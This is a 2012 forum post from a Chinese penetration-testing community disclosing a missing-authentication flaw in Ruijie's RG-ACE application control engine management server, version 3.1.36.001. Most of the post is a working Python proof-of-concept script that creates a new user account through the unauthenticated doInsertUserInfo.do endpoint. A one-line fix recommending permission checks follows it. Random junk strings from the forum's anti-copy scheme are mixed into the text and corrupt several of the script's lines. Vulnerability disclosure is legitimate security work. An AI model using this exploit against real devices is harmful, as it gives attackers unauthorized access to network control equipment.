中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

---

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
& R; x% Q( P$ K& I: ^2 F6 C
* T+ B9 n: u9 G
1 G% D- ?0 g5 L* H0 E* L测试的具体版本是
产品名称: 锐捷应用控制引擎
7 @' r2 \- Y, f, w5 |' G* v版本号: 3.1.36.001 TC
编译时间: 201104291730

1 h* `8 T; F  Z
! z- G1 x0 `2 U* g; p漏洞证明：
  p( ~) }( x% y5 Z, o

+ Z/ F3 L7 H! O( M7 a% e
2 n8 {* W8 K# |+ P, z7 N

- B9 a$ c- A! q. Q& F+ z+ u
+ ]" j. o. u. w* R执行脚本
#! /usr/bin/env python
8 T, _, |$ E+ M$ `#coding=gbk
3 N& ^7 `$ l/ a7 @) R  _2 ]#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
1 L5 a0 t9 v- b0 v' R+ i) j6 Curl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
8 \0 i9 j) D: Z3 V0 ?$ j. ^$ _: Eopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
9 o7 b) w% J' upost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
3 Y& Q9 j" B7 F3 t9 d" l# B0 p% E& ~("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
  j7 x: _: X# p$ B- ]9 U("mobilePhone",""),
("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
- U  v, E3 [7 _2 F- \0 r
+ j6 G9 O- e9 R/ R登录，连接设备

9 {6 w, F% i$ A" p



( w2 C# B2 T; A5 ]; _, r) H默认的管理员admin权限更大点

. P. Y; Y& {$ ?$ L/ e
8 S/ \7 t+ [' \  v

4 O, _7 \3 D% Y$ W3 Q
" I8 A; y6 \, H  O7 X修复方案：
加强对接口的权限验证
3 ^6 K! g' ]$ \, E
1 U* O, ~2 w9 ~$ `/ f: ?

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2